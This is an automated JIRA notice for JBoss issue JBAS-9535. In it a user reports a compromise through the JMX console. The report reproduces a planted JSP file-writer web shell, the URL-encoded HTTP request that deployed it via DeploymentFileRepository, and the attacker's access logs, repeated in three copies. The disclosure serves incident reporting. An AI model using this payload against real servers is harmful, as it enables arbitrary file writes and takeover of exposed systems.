[JBoss JIRA] (JBAS-9535) Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName

Wednesday, 24 April 2013

     [
https://issues.jboss.org/browse/JBAS-9535?page=com.atlassian.jira.plugin....
]

Mike Hansen updated JBAS-9535:
------------------------------

    Description: 
I noticed a new deployment called myname.war with index.jsp which had the following
inside:

<%
  if(request.getParameter("f")!=null)
    (new java.io.FileOutputStream(application.getRealPath("\\") + 
request.getParameter("f"))).write(request.getParameter("t").getBytes()
);
%>
mynameok

I looked into my web server logs and found the following entry:

ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -

I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've
seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but
they've been unsuccessful so far.)

Here is the complete log of the exploit as recorded by the webserver:

  access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/web-console/dtree.js HTTP/1.0" 302 -
"http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
  access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/jmx-console/jboss.css HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
  access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
  access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET
/invoker/JMXInvokerServlet HTTP/1.0" 200 3365
"http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT
6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
  access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 302 - "-" "-"
  access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST
/invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-"
"Java/1.6.0_10-rc2"
  access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
  ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -
  ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 10.101.48.70 TLSv1 RC4-MD5 "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" -

  was:
I noticed a new deployment called myname.war with index.jsp which had the following
inside:

<%
  if(request.getParameter("f")!=null)
    (new java.io.FileOutputStream(application.getRealPath("\\") + 
request.getParameter("f"))).write(request.getParameter("t").getBytes()
);
%>
mynameok

I looked into my web server logs and found the following entry:

ssl_access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -

I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've
seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but
they've been unsuccessful so far.)

Here is the complete log of the exploit as recorded by the webserver:

  access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/web-console/dtree.js HTTP/1.0" 302 -
"http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
  access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/jmx-console/jboss.css HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
  access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
  access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET
/invoker/JMXInvokerServlet HTTP/1.0" 200 3365
"http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT
6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
  access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 302 - "-" "-"
  access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST
/invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-"
"Java/1.6.0_10-rc2"
  access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
ssl_access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -
  ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 211.101.48.70 TLSv1 RC4-MD5 "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" -

...
 Exploit found in JBoss JMX Console via
HtmlAdaptor?action=invokeOpByName
 ------------------------------------------------------------------------

                 Key: JBAS-9535
                 URL: https://issues.jboss.org/browse/JBAS-9535
             Project: Application Server 3  4  5 and 6
          Issue Type: Bug
      Security Level: Public(Everyone can see) 
          Components: JMX
    Affects Versions: JBossAS-5.1.0.GA
         Environment: CentOS 5.4
            Reporter: Mike Hansen

 I noticed a new deployment called myname.war with index.jsp which had the following
inside:
 <%
   if(request.getParameter("f")!=null)
     (new java.io.FileOutputStream(application.getRealPath("\\") + 
request.getParameter("f"))).write(request.getParameter("t").getBytes()
 );
 %>
 mynameok
 I looked into my web server logs and found the following entry:
 ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -
 I double-checked our server and we had implemented the fixes for CVE-2010-0738.
(We've seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit,
but they've been unsuccessful so far.)
 Here is the complete log of the exploit as recorded by the webserver:
   access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
 access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/web-console/dtree.js HTTP/1.0" 302 -
"http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
   access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/jmx-console/jboss.css HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
   access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
   access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET
/invoker/JMXInvokerServlet HTTP/1.0" 200 3365
"http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT
6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
   access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 302 - "-" "-"
   access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
 access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST
/invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-"
"Java/1.6.0_10-rc2"
   access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
   ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -
   ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 10.101.48.70 TLSv1 RC4-MD5 "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" - 
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006